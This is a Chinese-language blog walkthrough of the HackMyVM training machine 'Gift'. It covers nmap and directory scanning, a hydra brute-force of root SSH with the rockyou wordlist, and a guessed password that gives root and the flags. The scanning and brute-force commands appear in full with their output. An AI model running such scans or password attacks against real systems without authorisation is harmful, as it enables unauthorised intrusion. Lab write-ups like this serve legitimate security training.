文章

Gift

发表于
作者 3 分钟阅读

Gift

image-20240316011250568

扫描一下,正常,开淦!

image-20240316011345266

信息搜集

端口扫描

1

sudo nmap -p- -Pn -sS 10.161.61.135

刚做完Azer,有点一朝被蛇咬,十年怕井绳的感觉,哈哈哈。。

1
2
3
4
5
6
7
8
9
10

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 13:18 EDT
Nmap scan report for 10.161.61.135
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:F1:BD:13 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds

目录扫描

1

dirb http://10.161.61.135

-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Fri Mar 15 13:19:53 2024
URL_BASE: http://10.161.61.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://10.161.61.135/ ----
+ http://10.161.61.135/index.html (CODE:200|SIZE:57)
-----------------
END_TIME: Fri Mar 15 13:19:56 2024
DOWNLOADED: 4612 - FOUND: 1

结果并不令人满意,换一个试试。

1

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.161.61.135 -f -t 200

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.161.61.135
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

获取flag

怪不得叫Gift,打开页面以后发现:

image-20240316012547831

查看源代码:

Dont Overthink. Really, Its simple.
	<!-- Trust me -->

查看敏感目录,一无所获。

无脑一波,尝试rockyou字典爆破ssh:

1

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135

爆破过程中手动连接一下ssh,随便尝试一些简单密码:

Trust me
Dont Overthink. Really, Its simple.
simple

结果进去了。。。。。还没爆破完呢。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

┌──(kali㉿kali)-[~/temp]
└─$ ssh root@10.161.61.135  
The authenticity of host '10.161.61.135 (10.161.61.135)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.61.135' (ED25519) to the list of known hosts.
root@10.161.61.135's password: 
Permission denied, please try again.
root@10.161.61.135's password: 
Permission denied, please try again.
root@10.161.61.135's password: 
IM AN SSH SERVER
gift:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~# ls -la
total 20
drwx------    2 root     root          4096 Sep 24  2020 .
drwxr-xr-x   22 root     root          4096 Sep 18  2020 ..
-rw-------    1 root     root            26 Mar 15 17:33 .ash_history
----------    1 root     root            12 Sep 24  2020 root.txt
-rw-rw----    1 root     root            12 Sep 24  2020 user.txt
gift:~# cat root.txt
HMVtyr543FG
gift:~# cat user.txt
HMV665sXzDS

后来爆破结果出来了:

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(kali㉿kali)-[~]
└─$ sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-15 13:29:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.161.61.135:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 10.161.61.135   login: root   password: simple
[STATUS] attack finished for 10.161.61.135 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-15 13:32:09

记录一下吧,真好!

Training platform, Hackmyvm
Hackmyvm web
本文由作者按照 CC BY 4.0 进行授权